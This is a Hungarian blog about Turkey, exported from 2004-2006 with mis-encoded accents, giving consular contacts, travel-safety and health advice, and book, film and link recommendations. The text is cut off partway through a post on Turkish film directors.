Canakkale, Manisa, Aydin, Balikesir<br /><br /><span style="color:#ff0000;">Ismet Gral tb. konzul, Ktahya</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fMagyar_kulkepviseletek_kulfoldon%2fTiszteletbeli_konzulatusok%2feuropa%2ehtm&amp;NRNODEGUID=%7bE18F34A9-D68A-4091-9B19-AC756BFBE88C%7d&NRCACHEHINT=Guest#Torokorszag">link</a> </div><div align="justify">telefon: (90)(274) 2250318, (90)(274)2250300</div><div align="justify">fax: (90)(274) 2250316</div><div align="justify">cםm: Macaristan Cumhuriyeti Fahri Konsoloslugu, Gral Porselen Eskisehir Yolu 5. km, 43001 Ktahya<br /><strong>konzuli kerlet</strong> (tartomבnyok): Ktahya, Antalya, Eskisehir, Usak, Afyon, Denizli, Burdur, Isparta, Mugla<br /><br /><span style="color:#ff0000;">Ankarai magyar nagykצvetsיg</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&amp;NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fMagyar_kulkepviseletek_kulfoldon%2fNagykovetsegek_es_Fokonzulatusok%2feuropa%2ehtm&NRNODEGUID=%7bD5E09E46-811C-4285-8D14-BF068F663154%7d&amp;NRCACHEHINT=Guest#Torokorszag">link</a><br />Sancak Mahallesi, Kossuth Lajos (Kahire) Caddesi 2. Yildiz, Cankaya, Ankara<br />Tel. (90)(312) 4422273, (90)(312) 4422275 (konzuli osztבly)<br />Fax: (90)(312) 4415049<br />E-mail: <a href="mailto:huembtur@isnet.net.tr">huembtur@isnet.net.tr</a><br /><strong>konzuli kerlet</strong> (tartomבnyok): minden tartomבny, amely nincs felsorolva az Isztambuli Főkonzulבtus konzuli kerletיnיl</div><div align="justify"><br /><span style="color:#ff0000;">Magyar Klgyminisztיrium</span> telefonszבma: (1) 458 1000, <a href="http://www.kulugyminiszterium.hu/kum/hu/bal/">link</a></div><div align="justify"><span style="color:#ff0000;">Budapesti tצrצk nagykצvetsיg</span> <a href="http://www.kulugyminiszterium.hu/kum2005/Templates/wordsablon.aspx?NRMODE=Published&NRORIGINALURL=%2fkum%2fhu%2fbal%2fKepviseletek%2fKulfoldi_kepviseletek_Magyarorszagon%2fNagykovetsegek_es_Fokonzulatusok%2feuropa%2ehtm&amp;NRNODEGUID=%7b4700BBF5-51D2-42B4-A275-B8D085BDB6F3%7d&NRCACHEHINT=Guest#torokorszag">link</a> van <a href="http://www.turkishembassy.hu/">sajבt honlapja is itt</a>, de hבrom יve fejlesztיs alatt:)</div><p align="justify"></p><div align="center"><strong><span style="color:#cc0000;">Efendi tanבcsai:</span></strong></div><div align="center"><strong><span style="color:#cc0000;"></span></strong></div><div align="left"><strong><span style="color:#ff0000;">- elutazבs előtt</span></strong></div><p align="justify"><span style="color:#000000;">Tבjיkozףdj a klgy honlapjבn a beutazבsi feltיtelekről <a href="http://www.kulugyminiszterium.hu/kum/hu/jobb/Konzuli_informaciok/Utazas_kulfoldre/Beutazasi_feltetelek/torokorszag.htm">(LINK ITT)</a> יs az utazבsi tanבcsokrףl <a href="http://www.kulugyminiszterium.hu/kum/hu/jobb/Konzuli_informaciok/Utazas_kulfoldre/Utazasi_tanacsok/torokorszag.htm">(LINK ITT)</a>, olvasd el az <a href="http://www.oek.hu/oek.web?nid=217&amp;pid=1&to=852,751,752">OEK</a> יs az <a href="http://efrirk.antsz.hu/portal/page?_pageid=240,1&amp;_dad=portal&_schema=PORTAL">ֱNTSZ</a> javaslatait יs jegyezd meg azokat.</span></p><p align="justify"><span style="color:#000000;">Kצss baleset-יs יletbiztosםtבst - nem egy ףriבsi kiadבs, s adott esetben nagy segםtsיg lehet. A halottszבllםtבs - ha nincs biztosםtבsod - milliףkba kerl, nem lםrבban, forintban. Az autףra legyen zצld kבrtyבd. A biztosםtבsi kצtvיnyt vidd magaddal az תtra, olvasd el, hogy tudjad, hogyan is kihez kell fordulni baj esetיn. </span></p><p align="justify"><span style="color:#000000;">Legyenek nבlad a magyar kיpviseletek telefonszבmai, s a veled utazף csalבdtagjaidnak, barבtaidnak is tudniuk kell, kit keressenek, ha bajba jutnak יs Te nem tudsz segםteni יppen. Jף, ha mindegyikknיl van nיmi aprףpיnz telefonra. </span></p><p align="justify"><span style="color:#000000;">Kיszםts fיnymבsolatot az תtiokmבnyaidrףl יs vidd azokat is magaddal. </span></p><p align="justify"><span style="color:#000000;">Magyarorszבgon maradף hozzבtartozףid tudjבk, hogy hova utazol יs szksיg esetיn hogyan lehet elיrni. </span></p><p align="justify"><span style="color:#000000;">Ha hitelkבrtyבd van, azt is tudd, milyen telefonszבmon kell יrtesםtened az azt kibocsבtף bankot, ha netבn elveszםted. Ha pיnz nיlkl maradsz a nyaralבs alatt, otthonrףl gyorsan יs megbםzhatףan tudnak neked pיnzt kldeni a Western Unionnal bבrhovב Tצrצkorszבgban. </span></p><p align="justify"><strong><span style="color:#ff0000;">- kצzlekedיs</span></strong></p><p align="justify"><span style="color:#000000;">Kצzתti ellenőrzיs alkalmבval mיg a lבtszatבt is kerld annak, hogy nem akarsz megבllni. Baleset esetיn kצvesd a tצrצk hatףsבgok utasםtבsait, tanתsםts egyttműkצdő magatartבst. Ha alkoholt fogyasztottבl, ne vezess autףt, klצnben jף esיlyed van, hogy Te vidd el a balhיt akkor is, ha nem vagy hibבs. A tצrצk kצzתti forgalomban valף rיszvיtel jףzanul is katasztrofבlis kצvetkezmיnyekkel jבrhat, a kצzlekedיsi morבl igen gyenge. Kיszlj fel minden eshetősיgre, lיgy defenzםv vezető. </span></p><p align="justify"><strong><span style="color:#ff0000;">- rendőrsיg (előבllםtבs, kihallgatבs, őrizetbe vיtel), תtlevיlelvesztיs</span></strong></p><p align="justify">Kצteles vagy igazolni szemיlyazonossבgodat יs ennyi. Jogod van rצgtצn kיrni, hogy יrtesםtsיk a magyar kיpviseletet, vagy az gyvיdedet. Nem vagy kצteles vallomבst tenni vagy bבrmit alבםrni, amit rבadבsul nem is יrtesz.</p><p align="justify">Ha elveszםted a papםrjaidat, be kell jelentened azt a legkצzelebbi rendőrkapitבnysבgon. Erről jegyzőkצnyvet kapsz, s az kell az orszבgbףl valף kilיpיshez. Magyar hazatיrיsi igazolvבnyt csak az ankarai nagykצvetsיg יs az isztambuli főkonzulבtus tud neked adni, a tb. konzulok nem.</p><p align="justify"><span style="color:#ff0000;"><strong>- tצrצk gyvיd</strong></span></p><p align="justify">Ha nagyobb bajban vagy, szksיged lehet valakire, aki kiigazodik a helyi jogi תtvesztőkben יs ezיrt idővesztesיg nיlkl lיpni kיpes, meg az sem baj, ha vannak kapcsolatai. Persze, pיnzbe kerl, ezיrt mיrlegeld, a kצltsיg mekkora haszonnal jבrhat szבmodra. Tצrצkorszבgban tצrצk gyvיd kell! Vagy magad keresel gyvיdet (ha van rב időd), vagy kיrheted a magyar klkיpviseletek segםtsיgיt. Ha a cellבdban van komputer יs internet-hozzבfיrיs, nekem is םrhatsz az <a href="mailto:efendi_online@yahoo.com">efendi_online@yahoo.com</a> cםmre, tanבcsaim abszolתt ingyenesek.</p><p align="justify">Ha mond neked valamit az, hogy Raskף-gy, akkor segםtsיg lehet: Raskף Emese gyvיdje Dilek Midik tצrצk gyvיdnő (Ada Hukuk Brosu azaz Ada Jogi Iroda) volt. gy tudom, jףl lבtta el a dolgבt, a szksיges empבtiבval יs igyekezettel. Csalבdjogi gyek mellett mבs bntetőgyekhez is יrt. A tצrצk mellett nיmetl beszיl. Megkeresheted (tצrצkl יs nיmetl) a (90 312) 438 94 90) telefonszבmon vagy a (90 312) 438 94 91 fax-szבmon. E-mail: <a href="mailto:adahukukburosu@yahoo.de">adahukukburosu@yahoo.de</a> vagy <a href="mailto:dilekmidik@mynet.com">dilekmidik@mynet.com</a>. </p><p align="justify"><strong><span style="color:#ff0000;">- terrorista tבmadבs</span></strong></p><p align="justify"><span style="color:#000000;">Ha lehetsיges, mielőbb hagyd el a merיnylet helyszםnיt, persze, a hatףsבgokkal egyttműkצdve, nehogy fיlreיrtsיk. Ha csak terrorista fenyegetיs, bombariadף van, akkor is srgősen בllj odיbb. Nem a Te dolgod a problיma megoldבsa! Ne vesztegesd az időt, ne kivבncsiskodj. Fogd a csalבdtagjaidat, s ha lehetsיges, mיg az תtiokmבnyaidat יs a legfontosabb יrtיkeidet is, יs srgősen tűnj el a helyszםnről. </span></p><p align="justify"><span style="color:#ff0000;"><strong>- kבbםtףszer, fegyver</strong></span></p><p align="justify">Felejtsd el. Ez az, amit igen szigorתan vesznek Tצrצkorszבgban (kבbםtףszerfogyasztבst is!). Ha kיtsיgeid vannak, nיzd meg a "Midnight express" c. filmet a tצrצk bצrtצnviszonyokrףl. Senkinek ne vigyיl sehova csomagot, ha nem nיzted meg, mi van benne. Sתlyos kצvetkezmיnyekkel jבr a műkincsek csempיszete is. </p><strong><span style="color:#ff0000;"><p align="justify"></span><span style="color:#ff0000;">- fצldrengיs</span></strong></p><p align="justify">Tצrצkorszבg nagy rיsze fצldrengיsveszיlyes צvezet. Klצnצsen Isztambul. <a href="http://www.foldrenges.hu/">A foldrenges.hu </a>szakיrtőinek nיhבny jףtanבcsa: </p><p align="justify">Mit tegynk fצldrengיs esetיn? Amםg tart a rengיs, ne hagyjuk el az יpletet, illetve ne prףbבljunk meg bejutni, ugyanis a legtצbb sיrlיs ilyenkor tצrtיnik (gondoljunk csak pl. a ledőlő kיmיnyekre, lehullף vakolatra יs vegcserepekre). Az יpleteken bell igyekezznk minיl tבvolabb kerlni ablakoktףl, vegektől, kצnyvespolcoktףl יs olyan tבrgyaktףl, amelyek leesve sיrlיst okozhatnak. Lehetősיg szerint keressnk menedיket az asztalok alatt vagy ajtףkeretekbe בllva. A szabadban kerljnk minיl messzebb az יpםtmיnyektől, fבktףl, elektromos vezetיkektől. A rengיst kצvetően zבrjuk el a gבz יs elektromos kיszlיkeket יs kיszljnk fel az esetleg bekצvetkező utףrengיsekre. Az erősen megsיrlt יpleteket minיl hamarabb el kell hagyni. </p><p align="justify"><span style="color:#cc0000;"><strong><span style="color:#ff0000;">- צzצnvםz</span> </strong></span></p><p align="justify"><span style="color:#333333;">Augusztus 16-17-יn<strong> </strong>Isztambulban az יvtized legnagyobb esőzיse, szיlorkבn stb. volt. A hatףsבgok idejיben szףltak, יn is. Komoly fennakadבsok voltak a kצzlekedיsben. Ilyenkor ne lj autףba יs kompra, ha parkolsz, a kocsit a vבros magasabban talבlhatף rיszein hagyjad, s ne pincebבrba menj mulatni :). </span><span style="color:#333333;">A kיpeket </span><a href="http://www.cnnturk.com/interactive/galeri.asp?PID=318&amp;haberID=28571"><span style="color:#333333;">itt</span></a><span style="color:#333333;"> lehet megnיzni. </span></p><p align="justify"><span style="color:#333333;">- </span><span style="color:#ff0000;"><strong>utazבs ֹszak-Ciprusra</strong></span></p><p align="justify"><span style="color:#333333;">Feltיtlenl olvasd el a <a href="http://www.kulugyminiszterium.hu/kum/hu/jobb/Konzuli_informaciok/Utazas_kulfoldre/Utazasi_tanacsok/ciprus.htm">magyar Klgy tבjיkoztatףjבt itt</a>. Abbףl kiderl, hogy EU-בllampolgבrkיnt elvileg bבrmelyik oldalrףl בtlיphetsz a ciprusi gצrצg-tצrצk tűzszneti vonalon, s ֹszak-Ciprusra is beutazhatsz Tצrצkorszבgbףl, de <span style="color:#ff0000;">csak sajבt felelőssיgedre</span>. Ha ֹszakon bajba kerlsz, a magyar hatףsבgok nem tudjבk az יrdekeidet kיpviselni יs vיdeni, mert Magyarorszבg nem ismeri el az יszaki בllamalakulatot. Ez azt jelenti, hogy a magyar hatףsבgok ֹszak-Cipruson semmilyen - konzuli, csalבdjogi, peres, biztosםtבsi יs mבs - gyedben nem tudnak eljבrni, tehבt magadra vagy utalva. Ebből kצvetkezik az is, hogy az יszak-ciprusi hivatalos papםrokat sem fogadjבk el Magyarorszבgon.</span></p><p align="justify"><span style="color:#ff0000;"><strong>- vיdőoltבsok, szemיlyes ףvintיzkedיsek</strong></span></p><p align="justify"><span style="color:#333333;"><a href="http://www.oek.hu/oek.web?to=750,852&amp;nid=210&pid=1&amp;lang=hun">Utazבssal kapcsolatos egיszsיggyi tבjיkoztatבs, vיdőoltבsok</a></span></p><p align="justify"><span style="color:#333333;"><strong>Kit kereshetsz utazבs előtt?</strong></span></p><p align="justify">Johan Bיla Orszבgos Epidemiolףgiai Kצzpont Nemzetkצzi Oltףkצzpontja: 097 Gyבli u. 5-7 tel: 215-0756 </p><p align="justify">Nemzetkצzi utazבsokkal kapcsolatban a Fővבrosi יs Megyei ֱNTSZ-ek oltףkצzpontjai is adnak felvilבgosםtבst יs oltבst</p><p align="justify">Trףpusi Ambulancia: Fővבrosi ײnkormבnyzat Szent Lבszlף Kףrhבz: 1097 Gyבli u. 5-7 tel: 455-8100 </p><p align="justify">Utazבsi Betegsיgek Klinikבja (Trףpusi szakambulancia)1135 Budapest XIII. Szabolcs u. 35.Tel: ; 3-409-149, Fax: 218-87-25 Levיlcםm: 1389 Budapest, Pf. 112 </p><p align="justify"><span style="color:#333333;"><a href="http://index.hu/politika/bulvar/hepat0903k/">Tצmeges hepatitisz fertőzיs Egyiptomban</a> - 2004. szeptember 3.</span></p><p align="justify"><span style="color:#333333;"><strong>Amit יn javaslok:</strong></span></p><p align="justify"><span style="color:#333333;">Utazבs előtt időben יrdeklődj az aktuבlis helyzetről!</span></p><p align="justify"><span style="color:#333333;"><span style="color:#ff0000;">A hepatitis-A יs B יs a hastםfusz elleni oltבsok hasznבrףl:</span> </span></p><p align="justify"><span style="color:#333333;">A hepatitis A (vםrusos mבjgyulladבs) vםrusa emberi יrintkezיssel (piszkos kיz) terjed. A fertőzצttek szיkletkkel rםtik a vםrust. Az יtelt előkיszםtő szemיlyzet gyakran a jבrvבny okozףja, nagy tצmegeket akkor יrint, ha az ivףvםz rendszerbe szennyvםz kerl. A part menti vizekben tenyיsztett tengeri בllatokbףl kיszlt nyers vagy nem elיggי בtfőzצtt tengeri יtelek, valamint a szיklettel trבgyבzott fצldben termelt nyers zצldsיgek is fertőzצttek lehetnek.</span></p><p align="justify"><span style="color:#333333;">A hastםfusz okozףje egy baktיrium, melyet a fertőzצttek szיkletkben rםtenek. Szיklettel szennyezett יtel, tבrgyak, piszkos kיz kצzvetםti egyik emberről a mבsikra. Ahol nagy a zsתfoltsבg, rossz a kצzműellבtottsבg יs az ivףvםz szיklettel szennyeződik, ott jבrvבnyos formבban fordul elő.</span></p><p align="justify"><span style="color:#333333;">A hepatitis B ( vםrusos mבjgyulladבs) fertőzיs tצrtיnhet minimבlis mennyisיgű vיrzיssel jבrף vיletlenszerű karcolבs eredmיnyekיnt, rosszul sterilizבlt fecskendő vagy injekciףs tű kצzvetםtיsיvel, kבbםtףszeresek kצrיben fertőződhet a kצzצs fecskendő, צssze lehet szedni tetovבlבs, flcimpa vagy orr lyukasztבsa, akupunktתra rיvיn, főkיnt pedig nemi תton (testnedvek). </span></p><p align="justify"><span style="color:#333333;">Szףval, esetleg beszerezheted ezt a hבrom betegsיget (is) Tצrצkorszבgban. </span></p><p align="justify"><span style="color:#333333;">Sokan ma sem hasznבlnak WC-papםrt: a WC-kagylףbףl vagy a pottyantףs WC-nיl a falbףl kiבll egy kis "vםzcsap", a dolgozף meg a bal kezיvel lemossa az alfelיt, a papםrt pedig csak szבrםtkozבsra hasznבlja. (Ezיrt illetlensיg fontosabb dolgot bal - azaz tisztבtlan - kיzzel csinבlni.) Ez magבngy volna, baj akkor van, ha ő főzi az ebיdedet.</span></p><p align="justify"><span style="color:#333333;">A javasolt vיdőoltבsok felvיtelיt fontold meg, de mיg időben, hogy vיdettsיged is legyen.</span></p><p align="justify"><span style="color:#333333;">Fogבszati problיmבidat oldd meg utazבs előtt: a fogבszati kezelיs veszיlyforrבs!</span></p><p align="justify"><span style="color:#333333;">Ne igyבl sehol vezetיkes vizet vagy forrבsvizet! Kb. 1/2 dollבr egy mבsfיl literes palackozott vםz, az megbםzhatף. Ha a szבllodai minibבrbףl veszel vizet, sokkal drבgבbb lehet, ezיrt inkבbb spבjzolj be a kצzיrtből. </span></p><p align="justify"><span style="color:#333333;">Gyakran moss kezet! A gyerekek is... </span></p><p align="justify"><span style="color:#333333;">Minden gymצlcsצt, zצldsיget alaposan, folyף vםzben tצbbszצr moss meg! Nem muszבj Neomagnolt hasznבlni, a lיnyeg az, hogy jףl mosd meg, akבr meleg vםzzel יs mosogatףszerrel is. Paradicsomot, paprikבt, kצrtיt, almבt, szőlőt, dinnyיt, ilyesmiket be lehet בztatni negyed-fיl ףrבra langyos, mosogatףszeres vםzbe. A fצldieper szerintem megtisztםthatatlan. </span></p><p align="justify"><span style="color:#333333;">Ha 4-5 csillagos szבllodבban kell eldצntened, eszel-e a salבtabבr kםnבlatבbףl, szerintem a kockבzat nem olyan nagy. Mבshol azonban gondold meg, mit eszel. Gyanתs helyeken tejes/majonיzes/zצldsיges יtelek יs italok fogyasztבsa nem ajבnlott! ֱltalבban jףl בtstצtt hתsokat egyיl! Kergemarhakףr ellen nagyjבbףl biztosםtva vagy: a tצrצkצk mבr vagy nyolc יve nem engedיlyezik a marhahתs importjבt a veszיlyesnek םtיlt orszבgokbףl.</span></p><p align="justify"><span style="color:#333333;">Utcבn vagy olcsףbb helyeken ne egyיl tצltצtt kagylףt! </span></p><p align="justify"><span style="color:#333333;">Vigyיl magaddal szיntablettבt, de jףl szבmםtsd ki a mennyisיgיt. Ha bajban vagy, naponta 2-4 alkalommal kell benyalnod belőle 4-10 tablettבt. Nehogy elindulj egy dobozzal! </span></p><p align="justify"><span style="color:#333333;">Ha tצbb napig hasmenיsed van יs lבzas vagy, menj orvoshoz, ki tudja, mit szedtיl צssze. Ha beteg voltבl Tצrצkorszבgban, nem baj, ha hazatיrיsed utבn ismיt megvizsgבltatod magadat. Ha utazבs utבn, mבr otthon jצnnיnek elő a bajaid, gondolj arra, hogy azokat esetleg Tצrצkorszבgban kaptad, s jף, ha ezt az orvosod is tudja.</span></p><p align="justify"><span style="color:#333333;">Termיszetesen nem ugyanannak a veszיlynek van kitיve az, aki a leglבtogatottabb tצrצk dlőhelyekre csoporttal utazik, mint az, aki Tצrצkorszבg elmaradottabb tיrsיgeit keresi fel egyיnileg.</span></p> -false - - - - -Efendi - -2004-08-21T16:00:13+02:00 -2004-11-07T18:41:13Z -2004-08-21T14:00:38Z - -tag:blogger.com,1999:blog-7074887.post-109309683868521122 -Linkajבnlף - -
    -
    AEGEE Ankara AEGEE Europe rendezvיnynaptבr -
    -
    -
    -
    -
    -
    -Spybot יs Spywareblaster - ingyenes vיdelem a kיmprogramok יs a rossz oldalak ellen, a kettő egytt a legjobb vיdelem (a Spybot magyar fellettel is rendelkezik), s kivבlףan egyttműkצdnek a Win XP mבsodik szervםzcsomagjבval is
    -
    -
    -
    -
    -
    Szerb Antal: A fehיr mבgus -
    -
    -
    -Skype - az בltalam ismert legjobb minősיgű ingyenes internetes telefon - ha van hitelkבrtyבd, arra is van lehetősיged, hogy igen olcsףn a szבmםtףgיpedről telefonבlj vezetיkes vagy mobil telefonszבmra.
    -
    -
    -
    - -false - - - - - -Efendi - -2004-08-17T22:09:30+02:00 -2004-08-17T20:36:30Z -2004-08-17T20:18:09Z - -tag:blogger.com,1999:blog-7074887.post-109277388904281092 -Adorjבn Imre: Boldog Istenkיnt יlni - -
    -
    Erre a kitűnő kצnyvre mבr rיgףta fel akartam hםvni a blog lבtogatףinak figyelmיt. A Terebess Kiadף jףvoltבbףl teljes szצvege olvashatף a fenti linken. Alapmű, mindenkinek, akit יrdekel az iszlבm misztika, a szתfizmus, vagy tudni akarja, ki volt Gl Baba יs a bektבsi dervisek, kik az alevik Tצrצkorszבgban. A torokorszag.lap.hu oldalon is van nיhבny alevi link, mיg a konyha fejezetben is, s ajבnlom, nיzzיtek meg az egyik legnagyobb tצrצk-nיmet alevi honlapot is. Innen mבr csak egy ugrבs Gיczi Jבnos kצnyve a muszlim rףzsakultuszrףl, valamint ֱgoston Gבbor יs Sudבr Balבzs kצnyve Gl Babבrףl, a budai trbיről יs a budapesti iszlבm kצzpont sok יvtizedes tervיről.
    -
    -
    -false -
    - - - -Efendi - -2004-08-17T21:41:00+02:00 -2005-12-12T13:30:11Z -2004-08-17T20:03:03Z - -tag:blogger.com,1999:blog-7074887.post-109277298380908508 -Orhan Pamuk: Hף -<div align="justify">2005 karבcsonyבra megjelent vיgre magyarul is Orhan Pamuk: Hף c. regיnye.</div><div align="justify"><br />"Minden יlet, akבr a hףpehely: tבvolrףl egyformבnak tűnik, de rejtיlyes erők egyszerivי יs megismיtelhetetlennי formבljבk" - vallja Orhan Pamuk legתjabb művיben. Megismerhetjk-e a mבsok szםvיben lakozף szeretetet יs fבjdalmat? Megיrthetjk-e azokat, akik oly mיly gyצtrelmeket יs oly sok csalףdבst יltek בt, hogy elkיpzelni sem tudjuk? Ezek a kיrdיsek foglalkoztatjבk Kבt, a kצltőt, amikor tםz יv frankfurti tבvollיt utבn, יdesanyja temetיsיre hazatיr Isztambulba.</div><div align="justify"><br />Elfogadja egy liberבlis lap felkיrיsיt, hogy oknyomozף riportot םrjon a tבvoli Kars vבrosבban zajlף klצnצs esemיnyekről. Sajבt gyermekkori vבgyainak a felidיzיse is vezיrli: amint tudomבst szerez rףla, hogy elvבlt asszonykיnt ott יl a gyצnyצrű Ipek, תjra feltבmadnak rיgen elfojtott יrzיsei. Ka felkeresi a titokzatos צngyilkossבgi hullבm בldozatakיnt elhunyt fiatal lבnyok csalבdtagjait יs barבtait, a helyi rendőrsיget, az esemיnyeket megצrצkםtő יs megjףsolף Hatבrvבrosi Hםrlap szerkesztőjיt, s kצzben lassan feltבrul előtte a vבros valףdi arca. Vallבsi יs politikai vitבk mיrgezik az emberek יletיt, a fennבllף בllamhatalom יs a nצvekvő iszlבm pבrt befolyבsa alatt vallבsi fanatikusok szבllnak szembe az egyhבzi reformok hםveivel. Ka יpp a Nemzeti Szםnhבzban szavalja egyik kצltemיnyיt, amikor fegyveres zavargבs tצr ki, יs a nיzőtיren יletיt veszti az iszlבm egyhבzi kצzיpiskola nיhבny tanulףja. </div><div align="justify"> <br /></div><div align="justify">A tragיdia rettenetes esemיnyek sorבt indםtja el: letartףztatבsok, ldצztetיsek, gyilkossבgok kצvetik egymבst, sokan a kurd nacionalistבkat okoljבk, tצbben pedig politikai tőkיt prףbבlnak kovבcsolni a forrongבsbףl. </div><div align="justify"> <br /></div><div align="justify">Az idיn Bיke-dםjjal jutalmazott Pamuk regיnye szlőhazבjבban heves indulatokat vבltott ki. Az isztambuli gyיszsיg perbe fogta a nיpszerű םrףt, mivel arrףl beszיlt, hogy Tצrצkorszבgban egymilliף צrmיnyt יs harmincezer kurdot gyilkoltak meg, amit az orszבg mindmבig nem ismert el hivatalosan. A Hף viszont egyיrtelmű kritikai יs olvasףi sikert aratott A mיltatבsok mind hangsתlyoztבk, hogy a szerző - aki az irodalmi Nobel-dםj egyik legerיlyesebbnek tartott vבromבnyosa-elemi erővel בbrבzolja a modern vilבg nyers brutalitבsבt יs elvakultsבgבt, יs minden szenzבciףיhes hםradבsnבl felkavarףbban irבnyםtja rב figyelmnket a kor יs a tיrsיg aktuבlis problיmבira,- םrja ismertetőjיben a <strong>Libri</strong>, ahol a kצnyv megvבsבrolhatף - <a href="http://www.fo.hu/cgi-bin/start.cgi/apps_fokusz/display/index.html?termek.id=92475&tag=2">LINK ITT</a> </div><div align="justify"> <br /></div><div align="justify">Pamuk bםrףsבgi pere egyיbkיnt december 16-בn kezdődik Isztambulban, de mבr folyamatban van egy mבsodik per is ellene.</div><div align="justify"> <br /></div><div align="justify">Pamuk tצbb kצnyve magyarul is megjelent, lבsd lent a "Kצnyv- יs cikkajבnlף" postban szereplő linkeket.</div><p>Orhan Pamukkal kapcsolatos linkek:<br /><a href="http://www.reviewsofbooks.com/snow/">1</a> <a href="http://www.laurahird.com/newreview/snow.html">2</a> <a href="http://www.nytimes.com/2004/08/15/books/review/STAR15.html">3</a> 4 <a href="http://www.randomhouse.com/catalog/display.pperl?0375406972">5</a> <a href="http://books.guardian.co.uk/departments/generalfiction/story/0,6000,1211858,00.html">6</a> <a href="http://www.theage.com.au/articles/2004/06/16/1087244973159.html?from=storyrhs&amp;oneclick=true">7</a> <a href="http://www.pandora.com.tr/urun.asp?id=45550">8</a> 9 10 </p><p><a href="http://www.welt.de/data/2005/10/23/793247.html">Pamuk prangert Trkenfeindlichkeit in Europa an</a>, Die Welt, 2005. okt. 23.</p><p><em>A Pamukkal szembeni tצrצkorszבgi nacionalista tבmadבsok hבtterיről:</em> </p><p><strong><a href="http://www.opendemocracy.net/arts-turkey/orhan_pamuk_2935.jsp">Murat Belge: “Love me, or leave me?”: the strange case of Orhan Pamuk</a></strong>, Open Democracy, 2005. okt. 18. </p><p><a href="http://hrw.org/english/docs/2005/09/29/turkey11872.htm">Case Against Novelist Threatens Freedom of Expression</a> (a Human Rights Watch levele a tצrצk igazsבggyminiszterhez, 2005. szept. 29.)</p><p><br /></p> -false - - - - -Efendi - -2004-08-10T13:53:21+02:00 -2005-01-06T12:04:21Z -2004-08-10T11:53:49Z - -tag:blogger.com,1999:blog-7074887.post-109213882988870112 -Ali Baba magyar-tצrצk sportrovata - -
    -
    -Sikerlt a blogra csבbםtanunk sportrovat-szerkesztőkיnt Ali Babבt, a magyar יs a tצrצk sport legavatottabb szakיrtőjיt. Hosszan kellett kergetni a honorבriummal, de aztבn nem tudott ellenבllni יs most mבr nem kםmיli a blog sportszerető olvasףit. Lehet tőle kיrdezni is, itt rצgtצn a post aljבn, a "comments" linkre kattintva. joncok előtte olvassבk el a technikai tudnivalףkat arrףl, hogyan lehet belebeszיlni a blogba! -
    -
    Nיhבny linkajבnlat: -
    -
    - -Foci: - -
    -Molnבr Balבzs az Ankaraspor focicsapatבban
    -
    -Besiktas -
    -Galatasaray -
    -Fenerbahce -
    -
    A tצbbi normבlis יs kalandsportot a http://torokorszag.lap.hu/ oldal "sport" blokkjבban talבlod meg - a szemיlyes beszבmolףkat pedig itt, Ali Baba tollבbףl!
    -
    -
    -false -
    - - - -Efendi - -2004-08-09T17:41:00+02:00 -2005-10-20T12:52:03Z -2004-08-09T10:41:11Z - -tag:blogger.com,1999:blog-7074887.post-109204807125830862 -Mבshol olvastuk - -
    - -
    Center for Strategic and International Studies, 2005. okt. 14.
    -

    -
    -
    - -
    Open Democracy, 2005. okt. 18.
    -
    -
    -
    -
    -The Wall Street Journal, 2005. febr. 16.
    -
    -Green Money, Islamist Politics in Turkey
    -
    Middle East Quarterly, Winter 2005
    -
    -Where Goes The U.S. - Turkey Relationship? -
    The Middle East Quarterly, 2004/3. (.pdf)
    -
    -Lakat az ajtףn, lakat a szבjon -
    Magyar Hםrlap. 2004. aug. 14.
    -
    -"Bring The Junta to Justice" -
    BIA, 2004. szept. 1.
    -
    -Turkey's Justice and Development Party: A Model for Democratic Islam? -
    The Middle East Intelligence Bulletin, 2004. jתn.-jתl.
    -
    -Turkey's Strategic Model - Myths and Realities -
    The Washington Quarterly, 2004 nyבr (.pdf)
    -
    -Tצrצk vilבg Nיmetorszבgban -
    Nיpszabadsבg, 2004. augusztus 14.
    -
    Tribal Turkey -
    Turkish Daily News, 2004. augusztus 3.
    -
    -The Kurdish Reawakening in Syria -
    The Middle East Intelligence Bulletin, 2004. בpr.
    -
    -Between Europe and the Middle East: The transformation of Turkish policy -
    MERIA, 2004. mבrc.
    -
    -Strategic location, political dislocation:Turkey, the United States, and Northern Iraq -
    MERIA, 2003. jתn.
    -
    -Turkey's November 2002 elections: A new beginning? -
    MERIA, 2002. dec.
    -
    -The November 2002 Elections and Turkey's New Political Era -
    MERIA, 2002. dec.
    -
    -Radical islamic political groups in Turkey -
    MERIA, 1997. dec.
    - -false - - - - -Efendi - -2004-08-04T01:04:41+02:00 -2004-12-07T19:58:41Z -2004-08-03T23:09:56Z - -tag:blogger.com,1999:blog-7074887.post-109157459609324276 -Blogajבnlף - - - -false - - - - -Efendi - -2004-08-02T17:29:00+02:00 -2006-01-02T20:14:30Z -2004-08-02T15:37:33Z - -tag:blogger.com,1999:blog-7074887.post-109146105375265564 -Magyar-Tצrצk Barבti Tבrsasבg - -
    -
    -Itt lבthatod a Magyarorszבgon műkצdő egyeslet programjait. Minden יrdeklődőt szeretettel vבrnak. -
    -
    - -
    -
    - -
    -
    - -
    -
    -A Tבrsasבg 2006. יvi rendezvיnyei: -
    -
    -
    -
    -
    -
    -
    -false -
    - - - -Efendi - -2004-07-31T14:15:00+02:00 -2005-02-18T20:33:36Z -2004-07-31T12:19:11Z - -tag:blogger.com,1999:blog-7074887.post-109127635161662448 -Mozi. Tצrצk filmrendezőkről יs filmjeikről -<div align="center"><img src="http://photos1.blogger.com/img/284/1037/400/headon.jpg" /><br /></div><p><br /><strong></strong> </p><p><strong><span style="font-size:130%;color:#ff0000;">FATIH AKIN</span></strong></p><p><strong>Fatih Akin</strong>, Nיmetorszבgban יlő tצrצk rendező <strong>"Fallal szemben"</strong> (Duvara karsi/Head-on) cםmű filmje nyerte 2004-ben az Arany Medvיt, a berlini filmfesztivבl fődםjבt, aztבn az יv eurףpai filmje lett. Nיmetorszבgban vagy 800 ezer nיző volt rב kivבncsi.</p><p align="justify">Most, hogy lבttam Akin hבrom filmjיt, csak azt tudom ajבnlani, hogy ti is nיzzיtek meg, יrdemes. A "<strong>Solino</strong>" az első, a hatvanas יvekben Nיmetorszבgban munkבt kereső olasz hבzaspבr יs fiaik יlete, remek film, leszבmםtva azt, hogy az utolsף negyede talבn egy kicsit 